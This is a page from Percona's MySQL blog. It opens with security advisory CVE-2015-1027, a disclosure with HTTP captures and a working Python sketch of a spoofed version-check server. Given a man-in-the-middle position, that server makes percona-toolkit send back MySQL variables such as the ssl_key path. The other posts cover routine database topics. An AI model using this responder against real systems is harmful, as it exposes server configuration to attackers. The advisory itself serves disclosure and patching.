

Latest MySQL Performance Blog posts

Percona's MySQL & InnoDB performance and scalability blog

Percona Security Advisory CVE-2015-1027

May 6, 2015 - 7:52am
Contents
  1. Summary
  2. Timeline
  3. Analysis
  4. Mitigating factors
  5. POC
  6. Acknowledgements
Summary

During a code audit performed internally at Percona, we discovered a
viable information disclosure attack: when coupled with a MITM attack,
the percona-toolkit and xtrabackup Perl components could be
coerced into returning additional MySQL configuration information.
The vulnerability has since been closed.

Timeline

2014-12-16 Initial research, proof of concept exploitation and report completion
2015-01-07 CVE reservation request to Mitre, LP 1408375
2015-01-10 CVE-2015-1027 assigned
2015-01-16 Initial fix code completion, testing against POC verified fix
2015-01-23 Internal notification of impending 2.2.13 release of Percona-toolkit
2015-01-26 2.2.13 percona toolkit released: blog post
2015-02-17 2.2.9 xtrabackup released: blog post
2015-05-06 Publication of this document

Analysis

The vulnerability exists in the --version-check functionality of the
Perl scripts (LP 1408375). While the fix implemented for CVE-2014-2029
(LP 1279502) patched the arbitrary command execution, MySQL
configuration information could still be exfiltrated by this method.

The normal HTTP/HTTPS conversation during a --version-check call is as
follows.

GET / HTTP/1.1
User-Agent: HTTP-Micro/0.01
Connection: close
Host: v.percona.com

HTTP/1.0 200 OK
Date: Mon, 15 Dec 2014 13:43:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=bjtu6oic82g07rgr9b5906qrg1; path=/
cache-control: no-cache
Content-Length: 144
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

OS;os_version
MySQL;mysql_variable;version_comment,version
Perl;perl_version
DBD::mysql;perl_module_version
Percona::Toolkit;perl_module_version

POST / HTTP/1.1
User-Agent: HTTP-Micro/0.01
Content-Type: application/octet-stream
Connection: close
X-Percona-Toolkit-Tool: pt-online-schema-change
Content-Length: 287
Host: v.percona.com

d6ca3fd0c3a3b462ff2b83436dda495e;DBD::mysql;4.021
1b6f35cca661d68ad4dfceeebfaf502e;MySQL;(Debian) 5.5.40-0+wheezy1
d6ca3fd0c3a3b462ff2b83436dda495e;OS;Debian GNU/Linux Kali Linux 1.0.9
d6ca3fd0c3a3b462ff2b83436dda495e;Percona::Toolkit;2.2.12
d6ca3fd0c3a3b462ff2b83436dda495e;Perl;5.14.2

HTTP/1.0 200 OK
Date: Mon, 15 Dec 2014 13:43:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=nnm4bs99gef0rhepdnclpin233; path=/
cache-control: no-cache
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

The issue centers on the interpretation of the response string:

MySQL;mysql_variable;version_comment,version

This could be modified to extract additional information, for example the
ssl_key path:

MySQL;mysql_variable;version_comment,version,ssl_key

The program flow for --version-check is:
pingback -> parse_server_response -> get_versions -> sub_for_type.
The issue is the literal lookup of the MySQL variables version_comment,
version and ssl_key (version 2.2.13 hard-codes the lookup to version_comment,version).
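
As an illustration only (the published stand-alone POC is linked below), here is a minimal sketch of what a spoofed v.percona.com responder could look like; it assumes the MITM/DNS-spoofing step that redirects the victim to the attacker's host is already in place, and the payload line with ssl_key is the hypothetical injection:

# Minimal sketch of a spoofed v.percona.com responder (illustration only).
# Assumes DNS spoofing/MITM already redirects the victim here, and that we
# can bind port 80 (requires elevated privileges).
from http.server import BaseHTTPRequestHandler, HTTPServer

# First-stage reply: the directives the real server sends, plus ssl_key.
PAYLOAD = (b"OS;os_version\n"
           b"MySQL;mysql_variable;version_comment,version,ssl_key\n"
           b"Perl;perl_version\n")

class SpoofedVersionCheck(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=UTF-8")
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def do_POST(self):
        # Second stage: the client POSTs the harvested values back to us.
        length = int(self.headers.get("Content-Length", 0))
        print(self.rfile.read(length).decode())  # the exfiltrated data
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

HTTPServer(("", 80), SpoofedVersionCheck).serve_forever()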

In versions < 2.2.13 there is also a silent downgrade to plain HTTP when
the SSL machinery is unavailable (IO::Socket::SSL fails to load):

my $protocol = 'https';  # optimistic, but...
eval { require IO::Socket::SSL; };
if ( $EVAL_ERROR ) {
    PTDEBUG && _d($EVAL_ERROR);
    $protocol = 'http';
}

Mitigating factors

Exploitation requires an existing network presence in order to perform
the MITM attack and spoof responses from v.percona.com.

This attack is limited to disclosing MySQL configuration information; no data exfiltration is known via this method at this time.

Debian and Ubuntu distribution packagers disabled this code in response to CVE-2014-2029.

POC

Python stand alone

Github GIST

MSF Module

Github GIST

Acknowledgements
  • Frank C – Percona (percona-toolkit dev)
  • Alexey K – Percona (percona-xtrabackup dev)
  • Peter S – Percona (Opensource director)
  • David B – Percona (ISA)
  • Andrea B – oCERT


Peter Zaitsev hits the road for East Coast MySQL Meetup tour

May 6, 2015 - 3:00am

Percona CEO Peter Zaitsev and Big Data guru Alexander Rubin will be speaking at Meetups along the East Coast next week with stops in Boston (May 11), New York City (May 12), Philadelphia (May 13) and Baltimore (May 14).

Dubbed the “MySQL Whistle-Stop Tour” since they’ll be traveling city to city via Amtrak, Peter will be speaking about last month’s Tokutek acquisition with audience Q&A, followed by a short presentation on “PXC – Next Generation HA for MySQL.”

Alexander will then discuss “advanced MySQL query tuning,” explaining how tuning MySQL queries and indexes can significantly increase the performance of your application and decrease response times.

And now for more detail around the talks….

Percona XtraDB Cluster (PXC) is a replacement for conventional MySQL master/slave architectures to eliminate replication lag and achieve a highly available masterless cluster of MySQL servers. In his talk Peter will discuss:

  • HA Solutions for MySQL
  • What PXC Has to Offer
  • Architecture Details
  • When to PXC and when not to PXC

And as I mentioned above, Peter will also talk about Tokutek, which has delivered Big Data processing power across two of the most important Open Source data management platforms: MySQL and MongoDB. The acquisition, which includes the Tokutek distribution of MongoDB, called TokuMX, positions Percona to offer design, service, support and remote management for both MySQL and a market-leading, ACID-compliant NoSQL database from one of the most trusted companies in the industry.

Alexander’s discussion on advanced MySQL query tuning will focus on tuning the “usual suspects”: queries with “Group By”, “Order By” and subqueries. These query types usually underperform in MySQL and add extra load, because MySQL may need to create temporary tables or perform a filesort. He’ll also share MySQL 5.6 features that can increase MySQL query performance for subqueries and “order by” queries.

We’ll also be raffling off one pass per meetup to the Percona Live Amsterdam (Sept. 21-22) conference, along with some cool Percona t-shirts. Tasty food and beverages will be complimentary… and you are also welcome to hang out and have a beer with Peter and Alexander after the meetup.

A huge thanks to our hosts, the meetup organizers!

Would your meetup group like to have a visit from Peter, Alexander and/or other Percona experts? Just let me know in the comments section below and I’ll be happy to see if we can make it happen. Percona is also happy to help with sponsorship of your meetups.


MongoDB’s flexible schema: How to fix write amplification

May 5, 2015 - 8:56am

Being schemaless is one of the key features of MongoDB. On the bright side, this allows developers to easily modify the schema of their collections without waiting for the database to be ready to accept a new schema. However, schemaless is not free, and one of the drawbacks is write amplification. Let’s focus on that topic.

Write amplification?

The link between schema and write amplification is not obvious at first sight. So let’s first look at a table in the relational world:

mysql> SELECT * FROM user LIMIT 2;
+----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+
| id | login | first_name | last_name | city      | country                          | zipcode | address                           | password   | birth_year |
+----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+
|  1 | arcu  | Vernon     | Chloe     | Paulista  | Cook Islands                     | 28529   | P.O. Box 369, 1464 Ac Rd.         | SSC44GZL5R |       1970 |
|  2 | quis  | Rogan      | Lewis     | Nashville | Saint Vincent and The Grenadines | H3T 3S6 | P.O. Box 636, 5236 Elementum, Av. | TSY29YRN6R |       1983 |
+----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+

As all records have exactly the same fields, the field names are stored once in a separate file (the .frm file). So the field names are metadata, while the value of each field for each record is, of course, data.

Now let’s look at an equivalent collection in MongoDB:

{ { "login": "arcu", "first_name": "Vernon", "last_name": "Chloe", "city": "Paulista", "country": "Cook Islands", "zipcode": "28529", "address": "P.O. Box 369, 1464 Ac Rd.", "password": "SSC44GZL5R", "birth_year": 1970 }, { "login": "quis", "first_name": "Rogan", "last_name": "Lewis", "city": "Nashville", "country": "Saint Vincent and The Grenadines", "zipcode": "H3T 3S6", "address": "P.O. Box 636, 5236 Elementum, Av.", "password": "TSY29YRN6R", "birth_year": 1983 } }

One difference from a table in the relational world is that MongoDB doesn’t know which fields each document will have. Therefore field names are data, not metadata, and they must be stored with each document.

Then the question is: how large is the overhead in terms of disk space? To have an idea, I inserted 10M such records in an InnoDB table (adding an index on password and on birth_year to make the table look like a real table): the size on disk is around 1.4GB.

I also inserted the exact same 10M records in a MongoDB collection using the regular MMAPv1 storage engine, again adding an index on password and on birth_year, and this time the size on disk is … 2.97GB!

Of course it is not an apples-to-apples comparison as the InnoDB storage format and the MongoDB storage format are not identical. However a 100% difference is still significant.
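
As a rough back-of-envelope check (my own estimate, not part of the original benchmark), the cost of repeating the field names in every document can be approximated like this:

# Rough estimate of the disk overhead of repeating field names per document.
# Assumption: BSON stores each field name as a NUL-terminated string plus a
# one-byte type tag, and MongoDB adds an _id field to every document.
field_names = ["_id", "login", "first_name", "last_name", "city",
               "country", "zipcode", "address", "password", "birth_year"]

per_doc = sum(len(name) + 2 for name in field_names)  # name + NUL + type tag
n_docs = 10_000_000

print(f"~{per_doc} bytes of field-name overhead per document")
print(f"~{per_doc * n_docs / 1024**3:.2f} GB across {n_docs:,} documents")

That alone plausibly accounts for around half of the ~1.5GB difference observed above; the rest likely comes from other differences in the storage formats, such as MMAPv1 record padding.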

Compression

One way to deal with write amplification is to use compression. With MongoDB 3.0, the WiredTiger storage engine is available and one of its benefits is compression (default algorithm: snappy). Percona TokuMX also has built-in compression using zlib by default.
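
With MongoDB 3.0 the compressor can also be chosen per collection at creation time. Here is a hedged sketch using PyMongo (the storageEngine option follows the 3.0 create-collection interface; treat the exact option string as an assumption):

# Sketch: create a WiredTiger collection with zlib block compression.
# Assumes a MongoDB 3.0 server already running the WiredTiger engine.
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
db = client.test

db.create_collection(
    "user",
    storageEngine={"wiredTiger": {"configString": "block_compressor=zlib"}},
)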

Rebuilding the collection with 10M documents and the 2 indexes now gives the following results:
WiredTiger: 1.14GB
TokuMX: 736MB

This is a 2.5x to 4x data size reduction, pretty good!

WiredTiger also provides zlib compression, and in this case the collection is only 691MB. However, CPU usage is much higher compared to snappy, so zlib will not be usable in all situations.

Conclusion

MongoDB’s schemaless design is attractive, but it comes with several tradeoffs. Write amplification is one of them, and using either WiredTiger with MongoDB 3.0 or Percona TokuMX is a very simple way to fix the issue.


Keep your MySQL data in sync when using Tungsten Replicator

May 4, 2015 - 3:00am

MySQL replication isn’t perfect and sometimes our data gets out of sync, either by a failure in replication or human intervention. We are all familiar with Percona Toolkit’s pt-table-checksum and pt-table-sync to help us check and fix data inconsistencies – but imagine the following scenario where we mix regular replication with the Tungsten Replicator:

We have regular replication going from a master (db1) to 4 slaves (db2, db3, db4 and db5), but db3 is also a master for db4 and db5, using Tungsten replication for one database called test. This setup is currently working this way because it was deployed some time ago, when multi-source replication was not possible using regular MySQL replication. This is now a working feature in MariaDB 10 and is also coming with the new MySQL 5.7 (not released yet)… in our case, it is what it is.

So how do we checksum and sync data when we have this scenario? Well we can still achieve it with these tools but we need to consider some extra actions:

pt-table-checksum  

First of all, we need to understand that this tool was designed to checksum tables in a regular MySQL replication environment, so we need to take special care to avoid checksum errors caused by replication lag (yes, Tungsten replication may still suffer replication lag). We also need to instruct the tool to discover slaves via a DSN table, because the tool is designed to discover replicas using regular replication. Both can be done using the --plugin and --recursion-method options.

My colleague Kenny already wrote an article about this some time ago, but let’s revisit it and put some graphics around our case. In order to make pt-table-checksum work properly within a Tungsten Replicator environment we need to:
– Configure the --plugin flag with this plugin to check replication lag.
– Use --recursion-method=dsn to avoid auto-discovery of slaves.
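
The DSN table referenced by --recursion-method=dsn must exist before the run. Here is a minimal setup sketch; the column layout follows the DSN table format from the pt-table-checksum documentation, while the pymysql driver and the credentials are assumptions:

# Sketch: populate the DSN table that --recursion-method=dsn reads.
# Assumes the percona schema already exists on db1 (pt-table-checksum
# creates percona.cksums there when run with --create-replicate-table).
import pymysql

conn = pymysql.connect(host="db1", user="checksum_user", password="...")
with conn.cursor() as cur:
    cur.execute("""
        CREATE TABLE IF NOT EXISTS percona.dsns (
            id        INT AUTO_INCREMENT PRIMARY KEY,
            parent_id INT DEFAULT NULL,
            dsn       VARCHAR(255) NOT NULL
        )""")
    # List only the Tungsten slaves of db3 that the tool cannot discover.
    cur.executemany("INSERT INTO percona.dsns (dsn) VALUES (%s)",
                    [("h=db4",), ("h=db5",)])
conn.commit()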

[root@db3]$ pt-table-checksum --replicate=percona.cksums \
    --create-replicate-table \
    --no-check-replication-filters \
    --no-check-binlog-format \
    --recursion-method=dsn=h=db1,D=percona,t=dsns \
    --plugin=/home/mysql/bin/pt-plugin-tungsten_replicator.pl \
    --check-interval=5 --max-lag=10 -d test
Created plugin from /home/mysql/bin/pt-plugin-tungsten_replicator.pl.
PLUGIN get_slave_lag: Using Tungsten Replicator to check replication lag
Checksumming test.table1:   2% 18:14 remain
Checksumming test.table1:   5% 16:25 remain
Checksumming test.table1:   9% 15:06 remain
Checksumming test.table1:  12% 14:25 remain
Replica lag is 2823 seconds on db5. Waiting.
Checksumming test.table1:  99% 14:25 remain
            TS ERRORS  DIFFS      ROWS  CHUNKS SKIPPED    TIME TABLE
04-28T14:17:19      0     13 279560873    4178       0 9604.892 test.table1

So far so good. We have implemented a good plugin that allows us to perform checksums considering replication lag, and we found differences that we need to take care of, let’s see how to do it.

pt-table-sync

pt-table-sync is the tool we need to fix data differences, but in this case we have 2 problems:
1- pt-table-sync doesn’t support --recursion-method=dsn, so we need to pass the hostnames to be synced as parameters. A feature request to add this recursion method can be found here (hopefully it will be added soon). This means we will need to sync each slave separately; see the sketch after this list.
2- Because of 1, we can’t use the --replicate flag, so pt-table-sync will need to re-run the checksums to find and fix differences. If the checksum found differences in more than 1 table, I’d recommend running the sync in separate steps – pt-table-sync modifies data. We don’t want to blindly ask it to fix our servers, right?
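
A small wrapper loop makes the per-slave runs less error-prone. A hypothetical sketch using Python's subprocess module (the hosts are the ones from this post, and it deliberately keeps --print until the output has been reviewed):

# Sketch: pt-table-sync lacks --recursion-method=dsn, so sync each
# Tungsten slave of db3 in its own run. Keep --print (instead of
# --execute) until the generated statements have been reviewed.
import subprocess

for slave in ("db4", "db5"):
    subprocess.run(["pt-table-sync", "--print", "--verbose",
                    "--databases", "test", "-t", "table1",
                    "--no-foreign-key-checks", "h=db3", f"h={slave}"],
                   check=True)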

That being said, I’d recommend running pt-table-sync with the --print flag first, just to make sure the sync process is going to do what we want it to do, as follows:

[root@db3]$ pt-table-sync --print --verbose --databases test -t table1 --no-foreign-key-checks h=db3 h=db4
# Syncing h=db4
# DELETE REPLACE INSERT UPDATE ALGORITHM START END EXIT DATABASE.TABLE
....
UPDATE `test`.`table1` SET `id`='2677', `status`='open', `created`='2015-04-27 02:22:33', `created_by`='8', `updated`='2015-04-27 02:22:33', WHERE `ix_id`='9585' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/;
UPDATE `test`.`table1` SET `id`='10528', `status`='open', `created`='2015-04-27 08:22:21', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9586' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/;
UPDATE `test`.`table1` SET `id`='8118', `status`='open', `created`='2015-04-27 18:22:20', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9587' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/;
UPDATE `test`.`table1` SET `id`='1279', `status`='open', `created`='2015-04-28 06:22:16', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9588' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/;
....
#      0       0      0  31195 Chunk     11:11:11 11:11:12 2    test.table1

Now that we are good to go, we will switch --print to --execute:

[root@db3]$ pt-table-sync --execute --verbose --databases test -t table1 --no-foreign-key-checks h=db3 h=db4
# Syncing h=db4
# DELETE REPLACE INSERT UPDATE ALGORITHM START    END      EXIT DATABASE.TABLE
#      0       0      0  31195 Nibble    13:26:19 14:48:54 2    test.table1

And voila: data is in sync now.

Conclusions

Tungsten Replicator is a useful tool for deploying these kinds of scenarios with no need to upgrade or change the MySQL version – but it still has some tricks to avoid data inconsistencies. General recommendations on good replication practices still apply here, e.g., not allowing users to run write commands on slaves and so on.

With this in mind, we can still run into issues with our data, but with a small extra effort we can keep things healthy without much pain.


LinkBenchX: benchmark based on arrival request rate

May 1, 2015 - 12:00am

An idea for a benchmark based on the “arrival request” rate, which I wrote about in a post headlined “Introducing new type of benchmark” back in 2012, was implemented in Sysbench. However, Sysbench provides only a simple workload, so to be able to compare InnoDB with TokuDB, and later MongoDB with Percona TokuMX, I wanted to use more complicated scenarios. (Both TokuDB and TokuMX are part of Percona’s product line – in case you missed it, Tokutek is now part of the Percona family.)

Thanks to Facebook – they provide LinkBench, a benchmark that emulates the social graph database workload. I made modifications to LinkBench, which are available here: https://github.com/vadimtk/linkbenchX. The summary of the modifications:

  • Instead of generating events in a loop, we generate events at the requested arrival rate and send each event for execution to one of the available Requester threads.
  • At the start, we establish N (requester) connections to the database; they are idle by default, just waiting for an incoming event to execute.
  • The main output of the benchmark is the 99% response time for ADD_LINK (INSERT + UPDATE request) and GET_LINKS_LIST (range SELECT request) operations.
  • A related output is Concurrency, that is, how many Requester threads are active during the time period.
  • The ability to report stats frequently (5-10 sec intervals), so we can see the trend and stability of the result.

Also, I provide a Java package, ready to execute, so you do not need to compile from source code. It is available on the release page at https://github.com/vadimtk/linkbenchX/releases

So the main focus of the benchmark is the response time and its stability over time.
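
Conceptually, open-loop (arrival-rate) generation schedules events by wall-clock time instead of waiting for the previous request to finish, so queueing shows up as latency rather than as reduced load. A minimal sketch of the idea in Python (LinkBenchX itself is Java; this is not its code):

# Sketch of open-loop load generation: requests are dispatched on a fixed
# schedule regardless of how long earlier requests take.
import time
from concurrent.futures import ThreadPoolExecutor

def run(request, rate_per_sec, duration_sec, max_workers=200):
    interval = 1.0 / rate_per_sec
    next_fire = time.monotonic()
    deadline = next_fire + duration_sec
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        while next_fire < deadline:
            delay = next_fire - time.monotonic()
            if delay > 0:
                time.sleep(delay)      # wait for the scheduled arrival
            pool.submit(request)       # hand off to an idle requester thread
            next_fire += interval      # schedule the next arrival

run(lambda: time.sleep(0.001), rate_per_sec=5000, duration_sec=10)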

For an example, let’s see how TokuDB performs under different request rates (this was a quick run to demonstrate the benchmark abilities, not to provide numbers for TokuDB).

The first graph shows the 99% response time (in milliseconds), measured every 10 sec, for arrival rates of 5000, 10000 and 15000 operations/sec:

or, to smooth the spikes, the same graph with a log10 scale on the Y axis:

So there are two observations: the response time increases with an increase in the arrival rate (as it is supposed to), and there are periodic spikes in the response time.

And now we can graph Concurrency (how many Threads are busy working on requests)…

…with the explainable observation that more threads are needed to handle bigger arrival rates, and that during spikes all available 200 threads (the number is configurable) become busy.

I am looking to adapt LinkBenchX to run an identical workload against MongoDB.
The current schema is simple:

CREATE TABLE `linktable` (
  `id1` bigint(20) unsigned NOT NULL DEFAULT '0',
  `id2` bigint(20) unsigned NOT NULL DEFAULT '0',
  `link_type` bigint(20) unsigned NOT NULL DEFAULT '0',
  `visibility` tinyint(3) NOT NULL DEFAULT '0',
  `data` varchar(255) NOT NULL DEFAULT '',
  `time` bigint(20) unsigned NOT NULL DEFAULT '0',
  `version` int(11) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`link_type`,`id1`,`id2`),
  KEY `id1_type` (`id1`,`link_type`,`visibility`,`time`,`id2`,`version`,`data`)
) ENGINE=TokuDB DEFAULT CHARSET=latin1;

CREATE TABLE `counttable` (
  `id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `link_type` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` int(10) unsigned NOT NULL DEFAULT '0',
  `time` bigint(20) unsigned NOT NULL DEFAULT '0',
  `version` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`,`link_type`)
) ENGINE=TokuDB DEFAULT CHARSET=latin1;

CREATE TABLE `nodetable` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL,
  `version` bigint(20) unsigned NOT NULL,
  `time` int(10) unsigned NOT NULL,
  `data` mediumtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=TokuDB DEFAULT CHARSET=latin1;

I am open to suggestions on the proper design of the documents for MongoDB – please leave your recommendations in the comments.


Optimizer hints in MySQL 5.7.7 – The missed manual

April 30, 2015 - 12:00am

In MySQL 5.7.7 Oracle presented a promising new feature: optimizer hints. However, it did not publish any documentation about the hints. The only note I found in the user manual about the hints is:

  • It is now possible to provide hints to the optimizer by including /*+ ... */ comments following the SELECT, INSERT, REPLACE, UPDATE, or DELETE keyword of SQL statements. Such statements can also be used with EXPLAIN. Examples:
    SELECT /*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */ f1 FROM t3 WHERE f1 > 30 AND f1 < 33;
    SELECT /*+ BKA(t1, t2) */ * FROM t1 INNER JOIN t2 WHERE ...;
    SELECT /*+ NO_ICP(t1) */ * FROM t1 WHERE ...;

There are also three worklogs: WL #3996, WL #8016 and WL #8017. But they describe the general concept and do not have much information about which optimizations can be used and how. More light on this is shed by slide 59 from Øystein Grøvlen’s session at Percona Live. But that’s all: no “official” full list of possible optimizations, no use cases… nothing.

I tried to sort it out myself.

My first finding is that slide #59 really lists six of the seven possible hints. Confirmation for this exists in one of the two new files under the sql directory of the MySQL source tree, created for this new feature.

$ cat sql/opt_hints.h
...
/**
  Hint types, MAX_HINT_ENUM should be always last.
  This enum should be synchronized with opt_hint_info
  array(see opt_hints.cc).
*/
enum opt_hints_enum
{
  BKA_HINT_ENUM= 0,
  BNL_HINT_ENUM,
  ICP_HINT_ENUM,
  MRR_HINT_ENUM,
  NO_RANGE_HINT_ENUM,
  MAX_EXEC_TIME_HINT_ENUM,
  QB_NAME_HINT_ENUM,
  MAX_HINT_ENUM
};

Looking into the file sql/opt_hints.cc, we can find out that these hints do not give much choice: they can only enable or disable the corresponding optimization.

$ cat sql/opt_hints.cc
...
struct st_opt_hint_info opt_hint_info[]=
{
  {"BKA", true, true},
  {"BNL", true, true},
  {"ICP", true, true},
  {"MRR", true, true},
  {"NO_RANGE_OPTIMIZATION", true, true},
  {"MAX_EXECUTION_TIME", false, false},
  {"QB_NAME", false, false},
  {0, 0, 0}
};

The chosen way to include hints in SQL statements – inside comments with a “+” sign, e.g. /*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */ – is compatible with the optimizer hint style that Oracle Database uses.

We actually had access to these hints before: they were accessible via the variable optimizer_switch – at least optimizations like BKA, BNL, ICP and MRR. But with the new syntax we can not only toggle them globally or per session, but also turn a particular optimization on or off for a single table or index in a query. I can demonstrate it with this quite artificial but always accessible example:

mysql> use mysql
Database changed
mysql> explain select * from user where host in ('%', '127.0.0.1');
+----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+
| id | select_type | table | partitions | type  | possible_keys | key     | key_len | ref  | rows | filtered | Extra                 |
+----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+
|  1 | SIMPLE      | user  | NULL       | range | PRIMARY       | PRIMARY | 180     | NULL |    2 |   100.00 | Using index condition |
+----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+
1 row in set, 1 warning (0.01 sec)

mysql> explain select /*+ NO_RANGE_OPTIMIZATION(user PRIMARY) */ * from user where host in ('%', '127.0.0.1');
+----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+
| id | select_type | table | partitions | type | possible_keys | key  | key_len | ref  | rows | filtered | Extra       |
+----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+
|  1 | SIMPLE      | user  | NULL       | ALL  | PRIMARY       | NULL | NULL    | NULL |    5 |    40.00 | Using where |
+----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+
1 row in set, 1 warning (0.00 sec)

I used one more hint, which we could not turn on or off directly earlier: range optimization.

One more “intuitively” documented feature is the ability to turn a particular optimization on or off. This works only for BKA, BNL, ICP and MRR: you can specify NO_BKA(table[[, table]…]), NO_BNL(table[[, table]…]), NO_ICP(table indexes[[, table indexes]…]) and NO_MRR(table indexes[[, table indexes]…]) to avoid using these algorithms for a particular table or index in the JOIN.

MAX_EXECUTION_TIME does not require any table or key name inside. Instead you need to specify the maximum time in milliseconds for which the query should run:

mysql> select /*+ MAX_EXECUTION_TIME(1000) */ sleep(1) from user;
ERROR 3024 (HY000): Query execution was interrupted, max_statement_time exceeded

mysql> select /*+ MAX_EXECUTION_TIME(10000) */ sleep(1) from user;
+----------+
| sleep(1) |
+----------+
|        0 |
|        0 |
|        0 |
|        0 |
|        0 |
+----------+
5 rows in set (5.00 sec)

QB_NAME is more complicated. WL #8017 tells us this is a “custom context”. But what is this? The answer is in the MySQL test suite! Tests for optimizer hints exist in the file t/opt_hints.test. For QB_NAME the very first entry is this query:

EXPLAIN SELECT /*+ NO_ICP(t3@qb1 f3_idx) */ f2 FROM
  (SELECT /*+ QB_NAME(QB1) */ f2, f3, f1 FROM t3 WHERE f1 > 2 AND f3 = 'poiu') AS TD
WHERE TD.f1 > 2 AND TD.f3 = 'poiu';

So we can specify a custom QB_NAME for any subquery and apply an optimizer hint only to that context.

To conclude this quick overview, I want to show a practical example of when query hints are really needed. Last week I worked on an issue where a customer upgraded from MySQL version 5.5 to 5.6 and found that some of their queries started to work slower than before. I wrote an answer which could sound funny, but still remains correct: “One of the reasons for such behavior is optimizer improvements. While they all are made for better performance, some queries – optimized for older versions – can start working slower than before.”

To demonstrate a public example of such a query, I will use my favorite source of information: the MySQL Community Bugs Database. In a search for Optimizer regression bugs that are still not fixed, we can find bug #68919, demonstrating a regression when the MRR algorithm is used for queries with LIMIT. If we run the queries shown in the bug report, we will see a huge difference:

mysql> SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1;
+----+----+----+----+
| pk | i1 | i2 | i3 |
+----+----+----+----+
| 42 | 42 | 42 | 42 |
+----+----+----+----+
1 row in set (6.88 sec)

mysql> explain SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1;
+----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+
| id | select_type | table | partitions | type  | possible_keys | key  | key_len | ref  | rows    | filtered | Extra                            |
+----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+
|  1 | SIMPLE      | t1    | NULL       | range | idx           | idx  | 4       | NULL | 9999958 |    33.33 | Using index condition; Using MRR |
+----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+
1 row in set, 1 warning (0.00 sec)

mysql> SELECT /*+ NO_MRR(t1) */ * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1;
+----+----+----+----+
| pk | i1 | i2 | i3 |
+----+----+----+----+
| 42 | 42 | 42 | 42 |
+----+----+----+----+
1 row in set (0.00 sec)

With MRR, query execution takes 6.88 seconds, and 0 if MRR is not used! But the bug report itself suggests using optimizer_switch="mrr=off"; as a workaround. And this will work perfectly well if you are OK with running SET optimizer_switch="mrr=off"; every time you are running a query which will take advantage of having it OFF. With optimizer hints you can have an algorithm ON for one particular table in the query and OFF for another one. I, again, took quite an artificial example, but it demonstrates the method:

mysql> explain select /*+ MRR(dept_emp) */ * from dept_emp where to_date in (select /*+ NO_MRR(salaries)*/ to_date from salaries where salary >40000 and salary <45000) and emp_no >10100 and emp_no < 30200 and dept_no in ('d005', 'd006','d007');
+----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+
| id | select_type  | table       | partitions | type   | possible_keys          | key        | key_len | ref                        | rows    | filtered | Extra                                         |
+----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+
|  1 | SIMPLE       | dept_emp    | NULL       | range  | PRIMARY,emp_no,dept_no | dept_no    | 8       | NULL                       |   10578 |   100.00 | Using index condition; Using where; Using MRR |
|  1 | SIMPLE       | <subquery2> | NULL       | eq_ref | <auto_key>             | <auto_key> | 3       | employees.dept_emp.to_date |       1 |   100.00 | NULL                                          |
|  2 | MATERIALIZED | salaries    | NULL       | ALL    | salary                 | NULL       | NULL    | NULL                       | 2838533 |    17.88 | Using where                                   |
+----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+
3 rows in set, 1 warning (0.00 sec)

 



Generated (Virtual) Columns in MySQL 5.7 (labs)

April 29, 2015 - 3:00am

